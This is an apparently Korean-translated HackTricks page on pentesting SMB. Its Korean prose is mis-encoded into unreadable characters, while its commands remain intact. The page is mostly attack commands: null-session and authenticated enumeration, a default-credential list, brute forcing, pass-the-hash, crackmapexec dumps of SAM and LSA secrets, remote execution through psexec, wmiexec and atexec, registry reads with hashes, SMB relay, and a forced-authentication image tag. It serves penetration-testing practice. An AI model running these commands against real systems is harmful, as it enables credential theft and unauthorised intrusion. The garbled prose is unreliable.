# 139,445 - Pentesting SMB
{% hint style="success" %}
Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: 
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## **Port 139**
_**λ€νΈμν¬ κΈ°λ³Έ μ
μΆλ ₯ μμ€ν
**_** (NetBIOS)**λ λ‘컬 μμ λ€νΈμν¬(LAN) λ΄μ μ ν리μΌμ΄μ
, PC λ° λ°μ€ν¬νμ΄ λ€νΈμν¬ νλμ¨μ΄μ μνΈ μμ©νκ³ **λ€νΈμν¬λ₯Ό ν΅ν λ°μ΄ν° μ μ‘μ μ©μ΄νκ² νκΈ° μν΄ μ€κ³λ μννΈμ¨μ΄ νλ‘ν μ½**μ
λλ€. NetBIOS λ€νΈμν¬μμ μλνλ μννΈμ¨μ΄ μ ν리μΌμ΄μ
μ μλ³ λ° μμΉλ μ΅λ 16μ κΈΈμ΄μ NetBIOS μ΄λ¦μ ν΅ν΄ μ΄λ£¨μ΄μ§λ©°, μ΄λ μ’
μ’
μ»΄ν¨ν° μ΄λ¦κ³Ό λ€λ¦
λλ€. λ μ ν리μΌμ΄μ
κ°μ NetBIOS μΈμ
μ ν μ ν리μΌμ΄μ
(ν΄λΌμ΄μΈνΈ μν )μ΄ **TCP ν¬νΈ 139**λ₯Ό μ¬μ©νμ¬ λ€λ₯Έ μ ν리μΌμ΄μ
(μλ² μν )μ "νΈμΆ"νλ λͺ
λ Ήμ λ°νν λ μμλ©λλ€.
```
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```
## Port 445
κΈ°μ μ μΌλ‘, ν¬νΈ 139λ βNBT over IPβλ‘ μΈκΈλλ©°, ν¬νΈ 445λ βSMB over IPβλ‘ μλ³λ©λλ€. μ½μ΄ **SMB**λ β**μλ² λ©μμ§ λΈλ‘**βμ μλ―Ένλ©°, νλμ μΌλ‘λ **κ³΅ν΅ μΈν°λ· νμΌ μμ€ν
(CIFS)**λ‘ μλ €μ Έ μμ΅λλ€. μ ν리μΌμ΄μ
κ³μΈ΅ λ€νΈμν¬ νλ‘ν μ½λ‘μ, SMB/CIFSλ μ£Όλ‘ νμΌ, νλ¦°ν°, μ§λ ¬ ν¬νΈμ λν 곡μ μ‘μΈμ€λ₯Ό κ°λ₯νκ² νκ³ , λ€νΈμν¬μ λ
Έλ κ° λ€μν ννμ ν΅μ μ μ΄μ§νλ λ° μ¬μ©λ©λλ€.
μλ₯Ό λ€μ΄, Windowsμ λ§₯λ½μμ SMBλ TCP/IPλ₯Ό ν΅ν΄ μ§μ μλν μ μμΌλ©°, ν¬νΈ 445λ₯Ό μ¬μ©νμ¬ TCP/IPλ₯Ό ν΅ν NetBIOSμ νμμ±μ μ κ±°ν©λλ€. λ°λλ‘, λ€λ₯Έ μμ€ν
μμλ ν¬νΈ 139μ μ¬μ©μ΄ κ΄μ°°λλ©°, μ΄λ SMBκ° TCP/IPλ₯Ό ν΅ν NetBIOSμ ν¨κ» μ€νλκ³ μμμ λνλ
λλ€.
```
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```
### SMB
**μλ² λ©μμ§ λΈλ‘ (SMB)** νλ‘ν μ½μ **ν΄λΌμ΄μΈνΈ-μλ²** λͺ¨λΈμμ μλνλ©°, **νμΌ**, λλ ν 리 λ° νλ¦°ν°μ λΌμ°ν°μ κ°μ κΈ°ν λ€νΈμν¬ λ¦¬μμ€μ λν **μ κ·Ό**μ κ·μ νκΈ° μν΄ μ€κ³λμμ΅λλ€. μ£Όλ‘ **Windows** μ΄μ 체μ μλ¦¬μ¦ λ΄μμ μ¬μ©λλ©°, SMBλ νμ νΈνμ±μ 보μ₯νμ¬ Microsoftμ μ΅μ μ΄μ 체μ λ₯Ό μ€ννλ μ₯μΉκ° μ΄μ λ²μ μ μ€ννλ μ₯μΉμ μννκ² μνΈ μμ©ν μ μλλ‘ ν©λλ€. λν, **Samba** νλ‘μ νΈλ SMBλ₯Ό **Linux** λ° Unix μμ€ν
μμ ꡬνν μ μλ λ¬΄λ£ μννΈμ¨μ΄ μ루μ
μ μ 곡νμ¬ SMBλ₯Ό ν΅ν ν¬λ‘μ€ νλ«νΌ ν΅μ μ μ΄μ§ν©λλ€.
λ‘컬 νμΌ μμ€ν
μ **μμ λΆλΆ**μ λνλ΄λ 곡μ λ SMB μλ²μ μν΄ μ 곡λ μ μμΌλ©°, ν΄λΌμ΄μΈνΈμκ² μλ²μ μ€μ ꡬ쑰μ λΆλΆμ μΌλ‘ **λ
립μ μΈ** κ³μΈ΅μ 보μ¬μ€λλ€. **μ κ·Ό μ μ΄ λͺ©λ‘ (ACLs)**μ **μ κ·Ό κΆν**μ μ μνλ©°, **`execute`**, **`read`**, **`full access`**μ κ°μ μμ±μ ν¬ν¨νμ¬ μ¬μ©μ κΆνμ λν **μΈλ°ν μ μ΄**λ₯Ό νμ©ν©λλ€. μ΄λ¬ν κΆνμ 곡μ λ₯Ό κΈ°λ°μΌλ‘ κ°λ³ μ¬μ©μ λλ κ·Έλ£Ήμ ν λΉλ μ μμΌλ©°, μλ²μμ μ€μ λ λ‘컬 κΆνκ³Όλ ꡬλ³λ©λλ€.
### IPC$ Share
IPC$ 곡μ μ λν μ κ·Όμ μ΅λͺ
λ μΈμ
μ ν΅ν΄ μ»μ μ μμΌλ©°, λͺ
λͺ
λ νμ΄νλ₯Ό ν΅ν΄ λ
ΈμΆλ μλΉμ€μ μνΈ μμ©ν μ μμ΅λλ€. μ΄ λͺ©μ μ μν΄ `enum4linux` μ νΈλ¦¬ν°κ° μ μ©ν©λλ€. μ μ ν μ¬μ©νλ©΄ λ€μμ νλν μ μμ΅λλ€:
* μ΄μ 체μ μ λν μ 보
* μμ λλ©μΈμ λν μΈλΆ μ 보
* λ‘컬 μ¬μ©μ λ° κ·Έλ£Ήμ λͺ©λ‘
* μ¬μ© κ°λ₯ν SMB 곡μ μ λν μ 보
* ν¨κ³Όμ μΈ μμ€ν
보μ μ μ±
μ΄ κΈ°λ₯μ λ€νΈμν¬ κ΄λ¦¬μκ° SMB (μλ² λ©μμ§ λΈλ‘) μλΉμ€μ 보μ νμΈλ₯Ό νκ°νλ λ° μ€μν©λλ€. `enum4linux`λ λμ μμ€ν
μ SMB νκ²½μ λν ν¬κ΄μ μΈ λ·°λ₯Ό μ 곡νλ©°, μ΄λ μ μ¬μ μΈ μ·¨μ½μ μ μλ³νκ³ SMB μλΉμ€κ° μ μ νκ² λ³΄νΈλλλ‘ νλ λ° νμμ μ
λλ€.
```bash
enum4linux -a target_ip
```
μμ λͺ
λ Ήμ `enum4linux`κ° `target_ip`λ‘ μ§μ λ λμμ λμμΌλ‘ μ 체 μ΄κ±°λ₯Ό μννλ λ°©λ²μ μμ
λλ€.
## NTLMμ΄λ
NTLMμ΄ λ¬΄μμΈμ§ λͺ¨λ₯΄κ±°λ κ·Έκ²μ΄ μ΄λ»κ² μλνλμ§, μ΄λ»κ² μ
μ©ν μ μλμ§ μκ³ μΆλ€λ©΄, **μ΄ νλ‘ν μ½μ΄ μ΄λ»κ² μλνλμ§μ μ΄λ₯Ό μ΄λ»κ² νμ©ν μ μλμ§ μ€λͺ
νλ** **NTLM**μ λν μ΄ νμ΄μ§κ° λ§€μ° ν₯λ―Έλ‘μΈ κ²μ
λλ€:
{% content-ref url="../../windows-hardening/ntlm/" %}
[ntlm](../../windows-hardening/ntlm/)
{% endcontent-ref %}
## **μλ² μ΄κ±°**
### **νΈμ€νΈ**λ₯Ό κ²μνμ¬ λ€νΈμν¬ μ€μΊ:
```bash
nbtscan -r 192.168.0.1/24
```
### SMB μλ² λ²μ
SMB λ²μ μ κ°λ₯ν μ·¨μ½μ μ μ°ΎμΌλ €λ©΄ μ΄λ€ λ²μ μ΄ μ¬μ©λκ³ μλμ§ μλ κ²μ΄ μ€μν©λλ€. μ΄ μ λ³΄κ° λ€λ₯Έ λꡬμμ λνλμ§ μλ κ²½μ°, λ€μμ μ¬μ©ν μ μμ΅λλ€:
* **MSF** 보쑰 λͺ¨λ \_**auxiliary/scanner/smb/smb\_version**
* λλ μ΄ μ€ν¬λ¦½νΈ:
```bash
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
```
### **μ΅μ€νλ‘μ κ²μ**
```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```
### **κ°λ₯ν** μ격 μ¦λͺ
| **μ¬μ©μ μ΄λ¦** | **μΌλ° λΉλ°λ²νΈ** |
| -------------------- | --------------------------------------- |
| _(λΉμΉΈ)_ | _(λΉμΉΈ)_ |
| guest | _(λΉμΉΈ)_ |
| Administrator, admin | _(λΉμΉΈ)_, password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
### λ¬΄μ°¨λ³ λμ
곡격
* [**SMB λ¬΄μ°¨λ³ λμ
곡격**](../../generic-methodologies-and-resources/brute-force.md#smb)
### SMB νκ²½ μ 보
### μ 보 νλ
```bash
#Dump interesting information
enum4linux -a [-u "" -p ""]
enum4linux-ng -A [-u "" -p ""]
nmap --script "safe or smb-enum-*" -p 445
#Connect to the rpc
rpcclient -U "" -N #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" #With creds
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]
```
### μ¬μ©μ, κ·Έλ£Ή λ° λ‘κ·ΈμΈν μ¬μ©μ λμ΄
μ΄ μ 보λ μ΄λ―Έ enum4linux λ° enum4linux-ngμμ μμ§λμ΄μΌ ν©λλ€.
```bash
crackmapexec smb 10.10.10.10 --users [-u -p ]
crackmapexec smb 10.10.10.10 --groups [-u -p ]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u -p ]
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
```
### λ‘컬 μ¬μ©μ μ΄κ±°
[Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py)
```bash
lookupsid.py -no-pass hostname.local
```
Oneliner
```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```
### Metasploit - λ‘컬 μ¬μ©μ μ΄κ±°
```bash
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
```
### **LSARPC λ° SAMR rpcclient μ΄κ±°νκΈ°**
{% content-ref url="rpcclient-enumeration.md" %}
[rpcclient-enumeration.md](rpcclient-enumeration.md)
{% endcontent-ref %}
### 리λ
μ€μμ GUI μ°κ²°
#### ν°λ―Έλμμ:
`xdg-open smb://cascade.htb/`
#### νμΌ λΈλΌμ°μ μ°½μμ (nautilus, thunar λ±)
`smb://friendzone.htb/general/`
## 곡μ ν΄λ μ΄κ±°νκΈ°
### 곡μ ν΄λ λͺ©λ‘
νμ μ κ·Όν μ μλμ§ νμΈνλ κ²μ΄ μ’μ΅λλ€. μ격 μ¦λͺ
μ΄ μλ κ²½μ° **null** **μ격 μ¦λͺ
/κ²μ€νΈ μ¬μ©μ**λ₯Ό μ¬μ©ν΄ 보μμμ€.
```bash
smbclient --no-pass -L // # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] // #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap -H [-P ] #Null user
smbmap -u "username" -p "password" -H [-P ] #Creds
smbmap -u "username" -p ":" -H [-P ] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H [-P ] #Recursive list
crackmapexec smb -u '' -p '' --shares #Null user
crackmapexec smb -u 'username' -p 'password' --shares #Guest user
crackmapexec smb -u 'username' -H '' --shares #Guest user
```
### **곡μ ν΄λ μ°κ²°/λͺ©λ‘**
```bash
#Connect using smbclient
smbclient --no-pass ///
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] // #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H [-P ] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H [-P ] # Non-Recursive list
smbmap -u "username" -p ":" [-r/-R] [Folder] -H [-P ] #Pass-the-Hash
```
### **μλμΌλ‘ μλμ° κ³΅μ λ₯Ό μ΄κ±°νκ³ μ°κ²°νκΈ°**
νΈμ€νΈ λ¨Έμ μ 곡μ λ₯Ό νμνλ λ° μ νμ΄ μμ μ μμΌλ©°, μ΄λ₯Ό λμ΄νλ €κ³ ν λ μ°κ²°ν μ μλ 곡μ κ° μλ κ²μ²λΌ λ³΄μΌ μ μμ΅λλ€. λ°λΌμ 곡μ μ μλμΌλ‘ μ°κ²°ν΄λ³΄λ κ²μ΄ μ’μ΅λλ€. 곡μ λ₯Ό μλμΌλ‘ μ΄κ±°νλ €λ©΄ μ ν¨ν μΈμ
(μ: null μΈμ
λλ μ ν¨ν μ격 μ¦λͺ
)μ μ¬μ©ν λ NT\_STATUS\_ACCESS\_DENIED λ° NT\_STATUS\_BAD\_NETWORK\_NAMEκ³Ό κ°μ μλ΅μ μ°Ύμ보λ κ²μ΄ μ’μ΅λλ€. μ΄λ 곡μ κ° μ‘΄μ¬νμ§λ§ μ κ·Όν μ μκ±°λ 곡μ κ° μ ν μ‘΄μ¬νμ§ μμμ λνλΌ μ μμ΅λλ€.
μλμ° νκ²μ μΌλ°μ μΈ κ³΅μ μ΄λ¦μ λ€μκ³Ό κ°μ΅λλ€.
* C$
* D$
* ADMIN$
* IPC$
* PRINT$
* FAX$
* SYSVOL
* NETLOGON
(_**Network Security Assessment 3rd edition**_μ μΌλ°μ μΈ κ³΅μ μ΄λ¦)
λ€μ λͺ
λ Ήμ μ¬μ©νμ¬ μ΄λ€μ μ°κ²°ν΄λ³Ό μ μμ΅λλ€.
```bash
smbclient -U '%' -N \\\\\\ # null session to connect to a windows share
smbclient -U '' \\\\\\ # authenticated session to connect to a windows share (you will be prompted for a password)
```
μ΄ μ€ν¬λ¦½νΈ(λ μΈμ
μ¬μ©)
```bash
#/bin/bash
ip=''
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
for share in ${shares[*]}; do
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
if [[ -z $output ]]; then
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
else
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
fi
done
```
μμ
```bash
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
```
### **Windowsμμ 곡μ λ₯Ό λμ΄νκΈ° / μλνν° λꡬ μμ΄**
PowerShell
```powershell
# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession ""
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
```
CMD μ½μ
```shell
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\ /all
```
MMC μ€λ
μΈ (κ·Έλν½)
```shell
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
```
explorer.exe (κ·Έλν½), `\\\`λ₯Ό μ
λ ₯νμ¬ μ¬μ© κ°λ₯ν λΉκ³΅μ ν΄λλ₯Ό νμΈν©λλ€.
### 곡μ ν΄λ λ§μ΄νΈνκΈ°
```bash
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```
### **νμΌ λ€μ΄λ‘λ**
μ격 μ¦λͺ
/Pass-the-Hashλ‘ μ°κ²°νλ λ°©λ²μ λ°°μ°λ €λ©΄ μ΄μ μΉμ
μ μ½μΌμμμ€.
```bash
#Search a file and download
sudo smbmap -R Folder -H -A -q # Search the file in recursive mode and download it inside /usr/share/smbmap
```
```bash
#Download all
smbclient ///
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
```
Commands:
* mask: λλ ν 리 λ΄ νμΌμ νν°λ§νλ λ° μ¬μ©λλ λ§μ€ν¬λ₯Ό μ§μ ν©λλ€ (μ: "" λͺ¨λ νμΌμ λν΄)
* recurse: μ¬κ·λ₯Ό μΌλλ€ (κΈ°λ³Έκ°: κΊΌμ§)
* prompt: νμΌ μ΄λ¦μ λν ν둬ννΈλ₯Ό λλλ€ (κΈ°λ³Έκ°: μΌμ§)
* mget: νΈμ€νΈμμ ν΄λΌμ΄μΈνΈ λ¨Έμ μΌλ‘ λ§μ€ν¬μ μΌμΉνλ λͺ¨λ νμΌμ 볡μ¬ν©λλ€
(_Information from the manpage of smbclient_)
### Domain Shared Folders Search
* [**Snaffler**](https://github.com/SnaffCon/Snaffler)\*\*\*\*
```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```
* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) μ€νμ΄λ.
* `-M spider_plus [--share ]`
* `--pattern txt`
```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```
νΉν ν₯λ―Έλ‘μ΄ κ³΅μ νμΌμ **`Registry.xml`**λ‘, μ΄λ **autologon**μ΄ Group Policyλ₯Ό ν΅ν΄ ꡬμ±λ μ¬μ©μμ λν **λΉλ°λ²νΈ**λ₯Ό ν¬ν¨ν μ μμ΅λλ€. λλ **`web.config`** νμΌμ μ격 μ¦λͺ
μ ν¬ν¨νκ³ μμ΅λλ€.
{% hint style="info" %}
**SYSVOL 곡μ **λ λλ©μΈ λ΄ λͺ¨λ μΈμ¦λ μ¬μ©μκ° **μ½μ μ μμ΅λλ€**. κ·Έ μμλ λ€μν λ°°μΉ, VBScript λ° PowerShell **μ€ν¬λ¦½νΈ**κ° μμ μ μμ΅λλ€.\
κ·Έ μμ **μ€ν¬λ¦½νΈ**λ₯Ό **νμΈ**ν΄μΌ νλ©°, **λΉλ°λ²νΈ**μ κ°μ λ―Όκ°ν μ 보λ₯Ό **μ°Ύμ μ** μμ΅λλ€.
{% endhint %}
## λ μ§μ€νΈλ¦¬ μ½κΈ°
λ°κ²¬λ μ격 μ¦λͺ
μ μ¬μ©νμ¬ **λ μ§μ€νΈλ¦¬**λ₯Ό **μ½μ μ** μμ΅λλ€. Impacket **`reg.py`**λ₯Ό μ¬μ©νμ¬ μλν μ μμ΅λλ€:
```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
```
## Post Exploitation
**Samba** μλ²μ **κΈ°λ³Έ ꡬμ±**μ μΌλ°μ μΌλ‘ `/etc/samba/smb.conf`μ μμΉνλ©°, λͺ κ°μ§ **μνν ꡬμ±**μ΄ μμ μ μμ΅λλ€:
| **μ€μ ** | **μ€λͺ
** |
| --------------------------- | ------------------------------------------------------------------- |
| `browseable = yes` | νμ¬ κ³΅μ μμ μ¬μ© κ°λ₯ν 곡μ λͺ©λ‘μ λμ΄ν μ μμ΅λκΉ? |
| `read only = no` | νμΌμ μμ± λ° μμ μ κΈμ§ν©λκΉ? |
| `writable = yes` | μ¬μ©μκ° νμΌμ μμ±νκ³ μμ ν μ μλλ‘ νμ©ν©λκΉ? |
| `guest ok = yes` | λΉλ°λ²νΈ μμ΄ μλΉμ€μ μ°κ²°ν μ μλλ‘ νμ©ν©λκΉ? |
| `enable privileges = yes` | νΉμ SIDμ ν λΉλ κΆνμ μ‘΄μ€ν©λκΉ? |
| `create mask = 0777` | μλ‘ μμ±λ νμΌμ μ΄λ€ κΆνμ΄ ν λΉλμ΄μΌ ν©λκΉ? |
| `directory mask = 0777` | μλ‘ μμ±λ λλ ν 리μ μ΄λ€ κΆνμ΄ ν λΉλμ΄μΌ ν©λκΉ? |
| `logon script = script.sh` | μ¬μ©μμ λ‘κ·ΈμΈ μ μ΄λ€ μ€ν¬λ¦½νΈλ₯Ό μ€νν΄μΌ ν©λκΉ? |
| `magic script = script.sh` | μ€ν¬λ¦½νΈκ° μ’
λ£λ λ μ΄λ€ μ€ν¬λ¦½νΈλ₯Ό μ€νν΄μΌ ν©λκΉ? |
| `magic output = script.out` | λ§λ² μ€ν¬λ¦½νΈμ μΆλ ₯μ΄ μ΄λμ μ μ₯λμ΄μΌ ν©λκΉ? |
`smbstatus` λͺ
λ Ήμ **μλ²** λ° **λκ° μ°κ²°λμ΄ μλμ§**μ λν μ 보λ₯Ό μ 곡ν©λλ€.
## Authenticate using Kerberos
**smbclient** λ° **rpcclient** λꡬλ₯Ό μ¬μ©νμ¬ **kerberos**μ **μΈμ¦**ν μ μμ΅λλ€:
```bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
```
## **λͺ
λ Ή μ€ν**
### **crackmapexec**
crackmapexecλ **wmiexec**κ° **κΈ°λ³Έ** λ°©λ²μΈ **mmcexec, smbexec, atexec, wmiexec**λ₯Ό **μ
μ©νμ¬** λͺ
λ Ήμ μ€νν μ μμ΅λλ€. μ¬μ©νκ³ μΆμ μ΅μ
μ `--exec-method` 맀κ°λ³μλ‘ μ§μ ν μ μμ΅λλ€:
```bash
apt-get install crackmapexec
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
crackmapexec smb -d -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb -d -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb -d -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb -d -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb -d -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb -d -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb -d -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb -d -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb -d -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb -d -u Administrator -p 'password' --rid-brute #RID brute
crackmapexec smb -d -u Administrator -H #Pass-The-Hash
```
### [**psexec**](../../windows-hardening/lateral-movement/psexec-and-winexec.md)**/**[**smbexec**](../../windows-hardening/lateral-movement/smbexec.md)
λ μ΅μ
λͺ¨λ **μ μλΉμ€λ₯Ό μμ±**ν©λλ€ (_\pipe\svcctl_μ μ¬μ©νμ¬ SMBλ₯Ό ν΅ν΄) νΌν΄μ λ¨Έμ μμ μ΄λ₯Ό μ¬μ©νμ¬ **무μΈκ°λ₯Ό μ€ν**ν©λλ€ (**psexec**λ **μ€ν νμΌμ ADMIN$ 곡μ μ μ
λ‘λ**νκ³ **smbexec**λ **cmd.exe/powershell.exe**λ₯Ό κ°λ¦¬ν€λ©° μΈμλ‘ νμ΄λ‘λλ₯Ό λ£μ΅λλ€ --**νμΌ μλ κΈ°λ²-**-).\
**μμΈν μ 보**λ [**psexec** ](../../windows-hardening/lateral-movement/psexec-and-winexec.md)μ [**smbexec**](../../windows-hardening/lateral-movement/smbexec.md)λ₯Ό μ°Έμ‘°νμμμ€.\
**kali**μμλ /usr/share/doc/python3-impacket/examples/μ μμΉν΄ μμ΅λλ€.
```bash
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]
./psexec.py -hashes administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
```
Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM**
### [wmiexec](../../windows-hardening/lateral-movement/wmiexec.md)/dcomexec
λμ€ν¬λ₯Ό 건λ리거λ μλ‘μ΄ μλΉμ€λ₯Ό μ€ννμ§ μκ³ **ν¬νΈ 135**λ₯Ό ν΅ν΄ DCOMμ μ¬μ©νμ¬ λͺ
λ Ή μ
Έμ μλ°νκ² μ€νν©λλ€.\
**kali**μμλ /usr/share/doc/python3-impacket/examples/μ μμΉν΄ μμ΅λλ€.
```bash
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@] #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
**맀κ°λ³μ**`-k`λ₯Ό μ¬μ©νλ©΄ **NTLM** λμ **kerberos**μ λν΄ μΈμ¦ν μ μμ΅λλ€.
```bash
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]
./dcomexec.py -hashes administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
### [AtExec](../../windows-hardening/lateral-movement/atexec.md)
SMBλ₯Ό ν΅ν΄ μμ
μ€μΌμ€λ¬λ₯Ό ν΅ν΄ λͺ
λ Ήμ μ€νν©λλ€ (_\pipe\atsvc_ μ¬μ©).\
**kali**μμλ /usr/share/doc/python3-impacket/examples/μ μμΉν΄ μμ΅λλ€.
```bash
./atexec.py [[domain/]username[:password]@] "command"
./atexec.py -hashes administrator@10.10.10.175 "whoami"
```
## Impacket reference
[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)
## **μ¬μ©μ μ격 μ¦λͺ
λ¬΄μ°¨λ³ λμ
**
**μ΄κ²μ κΆμ₯λμ§ μμΌλ©°, μ΅λ νμ© μλλ₯Ό μ΄κ³Όνλ©΄ κ³μ μ΄ μ°¨λ¨λ μ μμ΅λλ€**
```bash
nmap --script smb-brute -p 445
ridenum.py 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
```
## SMB 릴λ μ΄ κ³΅κ²©
μ΄ κ³΅κ²©μ Responder ν΄ν·μ μ¬μ©νμ¬ **λ΄λΆ λ€νΈμν¬μμ SMB μΈμ¦ μΈμ
μ μΊ‘μ²**νκ³ , μ΄λ₯Ό **λμ λ¨Έμ **μΌλ‘ **μ€κ³**ν©λλ€. μΈμ¦ **μΈμ
μ΄ μ±κ³΅νλ©΄**, μλμΌλ‘ **μμ€ν
** **μ
Έ**λ‘ μ§μ
νκ² λ©λλ€.\
[**μ΄ κ³΅κ²©μ λν λ λ§μ μ 보λ μ¬κΈ°μμ νμΈνμΈμ.**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
## SMB-Trap
Windows λΌμ΄λΈλ¬λ¦¬ URLMon.dllμ νμ΄μ§κ° SMBλ₯Ό ν΅ν΄ μΌλΆ μ½ν
μΈ μ μ κ·Όνλ €κ³ ν λ μλμΌλ‘ νΈμ€νΈμ μΈμ¦μ μλν©λλ€. μ: `img src="\\10.10.10.10\path\image.jpg"`
